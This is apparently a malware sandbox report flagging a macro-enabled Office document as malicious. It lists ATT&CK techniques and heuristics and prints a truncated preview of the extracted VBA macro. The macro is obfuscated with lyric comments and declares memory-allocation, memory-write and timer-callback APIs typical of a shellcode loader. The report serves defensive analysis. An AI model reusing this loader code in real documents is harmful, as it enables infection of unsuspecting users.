MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
The file is an Office document containing VBA macros, including a Document_Open macro, which is a common technique for malware execution. The presence of a macro-enable lure indicates an attempt to bypass security measures. The VBA code itself appears to be obfuscated, suggesting an intent to hide its malicious functionality, likely to download and execute a second-stage payload.
Heuristics 5
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 211,458 bytes but its declared streams total only 125,149 bytes — 86,309 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13266 bytes |
SHA-256: ed307cbb7932b097fc2ec7968dcfeefe1f505c7e9a21d271c614fe7bfd2d8e27 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jacks" ' Then you rolled in with your hair in the wind ' Rain was driving, thunder, lightning #If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then ' Driving us to your house ' And hit me like a hurricane Public Declare PtrSafe Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (napaea As Any, ByVal accipere As Any, ByVal antisubmarine As Any, ByVal suffrage As Any, ByVal millersthumb As Any, ByVal holster As Any, ByVal ankle As Any) As Long ' I was doing alright ' We locked eyes over whiskey on ice ' We locked eyes over whiskey on ice ' Driving us to your house Public Declare PtrSafe Function naboom Lib "Ntdll.dll " Alias "AcquireSRWLockShared" (campagne As Any) As LongPtr ' Driving us to your house ' You wrecked my whole world when you came ' I was doing alright Public Declare PtrSafe Function filefish Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (afflictive As LongPtr, faute As LongPtr, ByVal unshockable As LongPtr, poundfoolishByVal As LongPtr, earthborn As LongPtr, ByVal boastful As LongPtr) As LongPtr ' The moon went hiding, stars quit shining ' But just your sight had my heart storming Public Declare PtrSafe Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal algorithmic As Any, ByVal distraction As Any, ByVal acrodont As Any, ByVal anglicism As Any, ByVal dynamism As Any) As LongPtr ' Rain was driving, thunder, lightning ' Started talking bout us again ' If I woulda just layed my drink down ' I was doing alright ' But just your sight had my heart storming ' The moon went hiding, stars quit shining #End If ' But you rolled in with your hair in the wind ' You wrecked my whole world when you came #If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then ' But you rolled in with your hair in the wind ' I was doing alright Public Declare Function riesling Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal berried As Any, ByVal astroloma As Any, ByVal decumbency As Any, ByVal insupportable As Any, ByVal dalmatic As Any) As Long ' Baby, without warning ' Baby, without warning ' But you rolled in with your hair in the wind ' Then you rolled in with your hair in the wind Public Declare Function filefish Lib "Ntdll.dll " Alias _ "NtAllocateVirtualMemory" (deterrent As Long, nonoscillatory As Long, ByVal pimple As Long, bryozoanByVal As Long, synchronistical As Long, ByVal nilpotent As Long) As Long ' But just your sight had my heart storming ' I wouldnt be in my truck ' I was doing alright ' We locked eyes over whiskey on ice ' Knew it was gonna be a long night ' Rain was driving, thunder, lightning ' If I woulda just layed my drink down ' We locked eyes over whiskey on ice Public Declare Function alate Lib "Kernel32" Alias "CreateTimerQueueTimer" (opinionatist As Any, ByVal dehort As Any, ByVal peripherally As Any, ByVal lipstick As Any, ByVal survene As Any, ByVal ashtoreth As Any, ByVal craftiness As Any) As Long ' But just your sight had my heart storming ' And hit me like a hurricane ' Baby, without warning ' Knew it was gonna be a long night #End If ' Hit me like a hurricane ' But just your sight had my heart storming Function moving() Dim pater(255) As Byte choking = 3 - 100 + 162 Do pater(choking) = choking - 65 choking = choking + 1 Loop While choking <= 90 + 1 choking = 40 + 8 Do pater(choking) = choking + 4 choking = choking + 1 Loop While choking <= 50 + 8 choking = 90 + 7 Do pater(choking) = choking - 71 choking = choking + 1 Loop While choking <= 120 + 3 pater(47) = 60 + 3 choking = 40 + 3 pater(choking) = 60 + 2 moving = pater End Function Function denunciation(attainture, abbess, lait) Select Case lait Case 33 + (10 / 2 - 5) denunciation = attainture \ abbess Case 43 + (5 - 3) / 2 - 1 denunciation = attainture And abbess Case 51 + (56 / 7 - 4 * 2) denunciation = attainture * abbess End Select End Function Function bizons(wrd, buls, lky) #If 2 + (12 * 2) > 14 / 2 And Win64 > (12 - 6 * ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.